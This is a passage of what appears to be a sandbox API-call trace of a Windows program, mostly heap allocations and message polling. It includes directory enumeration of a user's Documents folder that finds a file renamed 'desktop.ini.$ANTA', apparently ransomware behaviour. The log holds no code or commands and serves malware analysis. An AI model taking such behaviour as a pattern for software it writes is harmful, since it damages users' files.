hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0084.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0084.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0084.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0084.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0084.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0084.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0084.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0084.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0084.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0084.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0084.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0084.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0084.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0084.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca508 [0084.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0084.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3a0 [0084.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x48) returned 0x428b588 [0084.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0084.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0084.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0084.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0084.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0084.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0084.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a500 [0084.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a500 | out: hHeap=0x1780000) returned 1 [0084.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0084.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0084.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0084.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0084.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0084.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3a0 | out: hHeap=0x1780000) returned 1 [0084.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0084.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0084.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0084.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0084.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0084.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0084.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0084.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0084.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0084.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0084.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7cf8 [0084.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x428b588 | out: hHeap=0x1780000) returned 1 [0084.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0084.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0084.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0084.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0084.107] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0084.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0084.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0084.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0084.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0084.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0084.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0084.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0084.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0084.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0084.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0084.108] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0084.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.108] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0084.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0084.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0084.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0084.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0084.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0084.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0084.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0084.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0084.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0084.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0084.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0084.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0084.109] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0084.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0084.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0084.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0084.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0084.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0084.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0084.109] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes")) returned 0x14 [0084.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0084.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0084.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0084.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0084.109] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0084.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0084.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0084.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0084.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0084.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0084.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0084.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0084.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0084.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0084.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca508 [0084.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0084.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0084.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0084.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0084.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0084.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0084.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0084.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0084.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0084.131] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0084.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0084.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0084.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0084.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0084.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0084.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0084.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0084.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0084.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0084.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0084.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0084.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0084.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0084.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0084.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0084.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.131] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0084.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0084.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0084.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0084.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0084.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0084.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0084.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0084.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0084.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0084.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0084.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0084.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0084.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0084.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0084.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a450 [0084.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0084.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0084.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0084.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0084.132] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xfe432e87, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfe432e87, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca598, cFileName=".", cAlternateFileName="")) returned 0x41ac500 [0084.133] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xfe432e87, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfe432e87, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca598, cFileName="..", cAlternateFileName="")) returned 1 [0084.133] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe07b8ef, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfe07b8ef, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfe373f8c, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x0, dwReserved1=0x43ca598, cFileName="desktop.ini.$ANTA", cAlternateFileName="DESKTO~1.$AN")) returned 1 [0084.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0084.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0084.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0084.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0084.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0084.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a450 | out: hHeap=0x1780000) returned 1 [0084.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0084.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0084.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0084.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0084.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.133] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0084.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0084.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0084.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0084.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0084.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.133] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0084.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0084.133] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0084.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0084.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0084.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0084.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0084.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0084.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0084.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0084.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0084.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0084.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0084.134] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0084.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0084.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0084.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0084.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0084.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.134] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0084.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0084.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0084.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0084.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0084.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0084.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0084.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0084.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0084.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0084.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0084.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0084.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0084.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4f0 [0084.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0084.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0084.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0084.135] PeekMessageW (in: 